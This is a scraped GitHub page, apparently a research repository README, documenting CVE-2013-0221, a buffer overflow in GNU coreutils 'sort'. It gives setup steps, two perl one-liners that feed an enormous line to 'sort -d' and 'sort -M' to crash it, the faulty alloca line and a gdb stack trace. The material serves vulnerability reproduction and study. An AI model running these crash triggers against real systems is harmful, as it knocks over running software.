Skip to content
Branch: master
Find file History
Pull request Compare This branch is 1 commit ahead, 3 commits behind mudongliang:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

CVE-2013-0221 & EDB-38232

Experiment Environment

CentOS 6.4

INSTALL & Configuration


tar -xvf coreutils-8.4-patched.tar.gz
cd coreutils-8.4

Problems in Installation & Configuration

How to trigger vulnerability

    perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d

    perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M


GNU Coreutils 'sort' Text Utility - Buffer Overflow

Vulnerability Details & Patch

Root Cause


	char *copy_a = (char *) alloca (lena + 1 + lenb + 1);

Stack Trace

(gdb) info stack
#0  0x08051bc0 in keycompare_mb (a=0xb6f00048, b=0xb6f00038) at sort.c:2722
#1  0x0804a556 in compare (a=0xb6f00048, b=0xb6f00038) at sort.c:2787
#2  0x0804cc52 in sortlines (lines=0xb6f00058, nlines=<value optimized out>, temp=0xb6f00038) at sort.c:3195
#3  0x0804fd52 in sort (argc=2, argv=0xbf8a9654) at sort.c:3496
#4  main (argc=2, argv=0xbf8a9654) at sort.c:4328


[1] CVE-2013-0221: coreutils: segmentation fault in "sort -d" and "sort -M" with long line input

You can’t perform that action at this time.